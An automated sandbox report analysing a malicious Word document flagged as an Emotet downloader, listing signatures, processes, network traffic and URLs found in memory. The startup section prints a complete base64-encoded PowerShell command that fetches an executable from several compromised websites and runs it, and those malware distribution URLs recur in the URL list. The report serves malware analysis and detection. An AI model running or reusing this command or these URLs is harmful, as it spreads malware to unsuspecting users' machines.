Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.12183.28160.28092

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.12183.28160.28092 (renamed file extension from 28092 to doc)
Analysis ID:255711
MD5:3c20d0817d04e702fd5166fc3ce8594b
SHA1:a984d3e6856342ddc5d6bf48d7de645ba8084cc1
SHA256:4b22feab70ea7d7acacbfaa93a8e2f6e0c3cd2520c63603caff2a970a78b1ea3

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet Downloader
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
PowerShell case anomaly found
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6048 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 3804 cmdline: powersheLL -e JABVAE0AQwBOAEwAbQBmAGUAPQAnAFIAVABFAE8ATQBjAGYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBUAGAAeQBgAHAAcgBPAGAAVABvAEMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQBEAE8AQQBXAGwAcQB2ACAAPQAgACcANwA0ADQAJwA7ACQASwBCAEEATgBIAGsAbQBvAD0AJwBaAEEARgBFAEIAdABxAHAAJwA7ACQAQwBRAEMAQwBXAHoAdwBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAEQATwBBAFcAbABxAHYAKwAnAC4AZQB4AGUAJwA7ACQAUABGAFAAVwBTAG0AZgB0AD0AJwBRAFEATQBVAFQAcwBiAGwAJwA7ACQATwBDAEQAWABEAHcAZQBrAD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcARQBiAGMAbABJAGUATgBUADsAJABNAFgAWgBLAFUAYQBxAHIAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAGEAdABjAGgAZABvAGcAcwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBYAEkAdwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBvAG8AdgB5AGIAbwBvAHYAZQAuAGMAbwAuAHUAawAvAGIAbABvAGcAcwAvADgAVAA5ADQAbQBtAGQAawBhADEAMwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBlAGcAZQBtAGUAcgBzAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaAB1AGQAeQAxADcAMgA0ADAALwAqAGgAdAB0AHAAOgAvAC8AZwB1AGEAcgBpAHoALgBjAG8AbQAuAGIAcgAvAFcAdQB1AHQAagBsAE8ALwAqAGgAdAB0AHAAOgAvAC8AaABhAGYAZABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AZgBoAHEANwBoADcAYgBhAGIAZABiAGUANQBxADUAMAA1ADIALwAnAC4AIgBTAHAATABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAWQBVAEMAWgB5AHMAZQA9ACcATABPAEQAVQBWAG0AcgBuACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAFgAUgBWAFgAcABsAGIAIABpAG4AIAAkAE0AWABaAEsAVQBhAHEAcgApAHsAdAByAHkAewAkAE8AQwBEAFgARAB3AGUAawAuACIAZABPAGAAVwBuAGAAbABgAE8AYQBEAEYAaQBMAEUAIgAoACQAWgBYAFIAVgBYAHAAbABiACwAIAAkAEMAUQBDAEMAVwB6AHcAbgApADsAJABaAE4ASQBOAEkAbgB6AHcAPQAnAEEARQBHAE4ARABwAHkAdwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEMAUQBDAEMAVwB6AHcAbgApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMwAyADkANQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABDAFEAQwBDAFcAegB3AG4AKQA7ACQATQBGAFIARQBOAGIAdABlAD0AJwBWAFYAWgBDAEcAZABiAHkAJwA7AGIAcgBlAGEAawA7ACQARwBQAEcARABDAGEAcgB6AD0AJwBYAEwATwBWAFkAdgB4AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBKAFUATQBQAGkAcgBhAD0AJwBCAEMAQQBKAEIAcQBtAHAAJwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 4376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.688098.pRHuXFXd.20200802001740.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xf9e:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xf9e:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xf9e:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.688098.pRHuXFXd.20200802001740.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: winword.exeMemory has grown: Private usage: 0MB later: 65MB
    Source: global trafficDNS query: name: www.hatchdogs.com
    Source: global trafficTCP traffic: 192.168.2.4:49717 -> 149.255.60.149:443
    Source: global trafficTCP traffic: 192.168.2.4:49716 -> 143.95.43.98:80

    Networking:

    barindex
    Creates HTML files with .exe extension (expired dropper behavior)Show sources
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: 744.exe.2.dr
    Source: global trafficHTTP traffic detected: GET /assets/XIw/ HTTP/1.1Host: www.hatchdogs.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.hatchdogs.com
    Source: global trafficHTTP traffic detected: GET /assets/XIw/ HTTP/1.1Host: www.hatchdogs.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.hatchdogs.com
    Source: 744.exe.2.drString found in binary or memory: <li><a href="https://www.facebook.com/groovyboove" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://www.twitter.com/groovyboove" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/groovyboove" target="_blank"><i class="fa fa-instagram"></i></a></li></ul> equals www.facebook.com (Facebook)
    Source: 744.exe.2.drString found in binary or memory: <li><a href="https://www.facebook.com/groovyboove" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://www.twitter.com/groovyboove" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/groovyboove" target="_blank"><i class="fa fa-instagram"></i></a></li></ul> equals www.twitter.com (Twitter)
    Source: 744.exe.2.drString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/groovyboove" /> equals www.facebook.com (Facebook)
    Source: 744.exe.2.drString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.groovyboove.co.uk/#organization","name":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire","url":"https://www.groovyboove.co.uk/","sameAs":["https://www.facebook.com/groovyboove","https://www.instagram.com/groovyboove","https://twitter.com/groovyboove"],"logo":{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#logo","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/BeFunky-collage.jpg?fit=2000%2C1111&ssl=1","width":2000,"height":1111,"caption":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire"},"image":{"@id":"https://www.groovyboove.co.uk/#logo"}},{"@type":"WebSite","@id":"https://www.groovyboove.co.uk/#website","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE - GROOVYBOOVE - WIRRAL - LIVERPOOL","description":"Photo Booth Hire In Liverpool Wirral Merseyside Cheshire Lancashire &amp; North Wales Chester","publisher":{"@id":"https://www.groovyboove.co.uk/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://www.groovyboove.co.uk/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#primaryimage","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=480%2C480&ssl=1","width":480,"height":480},{"@type":"WebPage","@id":"https://www.groovyboove.co.uk/#webpage","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE FROM \u00a3180 &#8902; PARTY &#8902; WEDDING & EVENTS &#8902;","isPartOf":{"@id":"https://www.groovyboove.co.uk/#website"},"about":{"@id":"https://www.groovyboove.co.uk/#organization"},"primaryImageOfPage":{"@id":"https://www.groovyboove.co.uk/#primaryimage"},"datePublished":"2019-05-12T20:54:32+00:00","dateModified":"2020-07-20T17:51:19+00:00","description":"LOW PRICED AWARD WINNING PHOTO BOOTH HIRE IN LIVERPOOL, WIRRAL, CHESHIRE, LANCASHIRE & NORTH WALES - BOOK TODAY & GET A FREE ALBUM ON 2 OR 3 HR HIRES.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.groovyboove.co.uk/"]}]}]}</script> equals www.facebook.com (Facebook)
    Source: 744.exe.2.drString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.groovyboove.co.uk/#organization","name":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire","url":"https://www.groovyboove.co.uk/","sameAs":["https://www.facebook.com/groovyboove","https://www.instagram.com/groovyboove","https://twitter.com/groovyboove"],"logo":{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#logo","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/BeFunky-collage.jpg?fit=2000%2C1111&ssl=1","width":2000,"height":1111,"caption":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire"},"image":{"@id":"https://www.groovyboove.co.uk/#logo"}},{"@type":"WebSite","@id":"https://www.groovyboove.co.uk/#website","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE - GROOVYBOOVE - WIRRAL - LIVERPOOL","description":"Photo Booth Hire In Liverpool Wirral Merseyside Cheshire Lancashire &amp; North Wales Chester","publisher":{"@id":"https://www.groovyboove.co.uk/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://www.groovyboove.co.uk/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#primaryimage","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=480%2C480&ssl=1","width":480,"height":480},{"@type":"WebPage","@id":"https://www.groovyboove.co.uk/#webpage","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE FROM \u00a3180 &#8902; PARTY &#8902; WEDDING & EVENTS &#8902;","isPartOf":{"@id":"https://www.groovyboove.co.uk/#website"},"about":{"@id":"https://www.groovyboove.co.uk/#organization"},"primaryImageOfPage":{"@id":"https://www.groovyboove.co.uk/#primaryimage"},"datePublished":"2019-05-12T20:54:32+00:00","dateModified":"2020-07-20T17:51:19+00:00","description":"LOW PRICED AWARD WINNING PHOTO BOOTH HIRE IN LIVERPOOL, WIRRAL, CHESHIRE, LANCASHIRE & NORTH WALES - BOOK TODAY & GET A FREE ALBUM ON 2 OR 3 HR HIRES.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.groovyboove.co.uk/"]}]}]}</script> equals www.twitter.com (Twitter)
    Source: unknownDNS traffic detected: queries for: www.hatchdogs.com
    Source: 744.exe.2.drString found in binary or memory: http://gmpg.org/xfn/11
    Source: PowerShell_transcript.688098.pRHuXFXd.20200802001740.txt.2.drString found in binary or memory: http://guariz.com.br/WuutjlO/
    Source: PowerShell_transcript.688098.pRHuXFXd.20200802001740.txt.2.drString found in binary or memory: http://hafder.com/images/fhq7h7babdbe5q5052/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: PowerShell_transcript.688098.pRHuXFXd.20200802001740.txt.2.drString found in binary or memory: http://www.hatchdogs.com/assets/XIw/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.onedrive.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 744.exe.2.drString found in binary or memory: https://api.w.org/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://app.powerbi.com/taskpane.html
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://augloop.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/css/dist/block-library/style.min.css
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/css/dist/block-library/theme.min.css
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/dist/a11y.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/dist/dom-ready.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/dist/vendor/wp-polyfill.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/imagesloaded.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/jquery/jquery-migrate.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/jquery/jquery.form.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/jquery/jquery.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/underscore.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/wp-custom-header.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/wp-embed.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/_inc/build/carousel/jetpack-carousel.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/_inc/build/lazy-images/js/lazy-images.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/_inc/build/photon/photon.min.js
    Source: 744.exe.2.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/css/jetpack.css
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://cdn.entity.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://cortana.ai
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://cr.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 744.exe.2.drString found in binary or memory: https://dfactory.eu/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://directory.services.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 744.exe.2.drString found in binary or memory: https://embed.tawk.to/5e0d2ef827773e0d832b7068/default
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://graph.windows.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://graph.windows.net/
    Source: PowerShell_transcript.688098.pRHuXFXd.20200802001740.txt.2.drString found in binary or memory: https://gregemerson.com/wp-includes/hudy17240/
    Source: PowerShell_transcript.688098.pRHuXFXd.20200802001740.txt.2.drString found in binary or memory: https://groovyboove.co.uk/blogs/8T94mmdka13/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?fit=300%2C68&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?fit=600%2C136&amp;ssl=
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?resize=300%2C68&amp;ss
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?w=600&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?w=800&#038;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?w=800&amp;is-pending-l
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?fit=274%2C300
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?fit=320%2C351
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?resize=274%2C
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?w=320&amp;ssl
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?w=800&#038;ss
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?w=800&amp;is-
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?fit=300%2C105&amp;ssl
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?fit=600%2C209&amp;ssl
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?resize=300%2C105&amp;
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?w=600&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?w=800&#038;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?w=800&amp;is-pending-
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?fit=2000%2C1111&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?fit=300%2C167&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?fit=800%2C445&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=1024%2C569&amp;ssl
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=300%2C167&amp;ssl=
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=768%2C427&amp;ssl=
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=800%2C445&#038;ssl
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=800%2C445&amp;is-p
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?w=1600&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?w=2000&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=180%2C180&#0
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=192%2C192&#0
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=270%2C270&#0
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=32%2C32&#038
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?fit=300%2C179&amp
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?fit=600%2C357&amp
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?resize=300%2C179&
